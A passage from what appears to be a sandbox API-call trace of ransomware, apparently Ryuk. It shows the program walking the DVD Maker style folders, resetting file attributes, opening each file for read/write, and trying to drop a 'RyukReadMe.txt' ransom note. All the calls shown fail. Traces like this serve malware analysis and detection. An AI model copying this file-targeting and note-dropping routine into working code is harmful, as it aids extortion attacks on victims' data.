Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.441] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.441] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.442] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.442] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.442] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv", dwFileAttributes=0x80) returned 0 [0133.442] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.442] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.443] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.443] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.443] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.443] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.443] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.443] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.443] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.443] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.443] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.443] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv", dwFileAttributes=0x80) returned 0 [0133.444] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.444] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.444] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.444] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.444] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.444] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.444] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.444] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.444] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.444] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.444] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.445] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png", dwFileAttributes=0x80) returned 0 [0133.445] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.445] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.446] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.446] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.446] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png", dwFileAttributes=0x80) returned 0 [0133.446] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.446] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.446] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.446] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.446] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.446] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0133.446] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.447] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.447] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.447] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.447] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.447] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png", dwFileAttributes=0x80) returned 0 [0133.447] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.447] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.447] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.447] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.447] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.447] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png", dwFileAttributes=0x80) returned 0 [0133.448] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.448] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.448] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.448] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.448] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.449] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png", dwFileAttributes=0x80) returned 0 [0133.449] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.449] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.449] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.449] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.449] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.449] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png", dwFileAttributes=0x80) returned 0 [0133.449] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.449] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.449] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.449] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.449] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.450] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png", dwFileAttributes=0x80) returned 0 [0133.450] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.450] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.450] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.450] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.450] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.450] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv", dwFileAttributes=0x80) returned 0 [0133.451] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.451] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.451] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.451] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.451] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.451] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.451] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.451] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.451] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.452] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.452] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.452] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv", dwFileAttributes=0x80) returned 0 [0133.452] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.452] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.452] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.452] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.452] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.452] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.452] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.453] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.453] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.453] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.453] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.453] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv", dwFileAttributes=0x80) returned 0 [0133.454] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.454] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.454] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.454] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.454] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.454] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.454] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.454] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.454] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.455] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png", dwFileAttributes=0x80) returned 0 [0133.455] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.455] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.455] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.455] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.455] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.455] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.455] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png", dwFileAttributes=0x80) returned 0 [0133.456] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.456] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.456] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.456] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.456] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.456] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png", dwFileAttributes=0x80) returned 0 [0133.456] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.456] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.456] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.457] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.457] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.457] SetLastError (dwErrCode=0x0) [0133.457] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.460] GetLastError () returned 0x5 [0133.460] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.460] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.460] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.460] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp", dwFileAttributes=0x80) returned 0 [0133.461] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.461] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.461] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.461] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.461] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.461] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", dwFileAttributes=0x80) returned 0 [0133.461] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.461] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.461] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.462] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.462] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.462] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", dwFileAttributes=0x80) returned 0 [0133.462] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.463] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.463] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", dwFileAttributes=0x80) returned 0 [0133.463] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.463] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.463] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.463] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.463] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.463] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.464] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.464] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.464] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 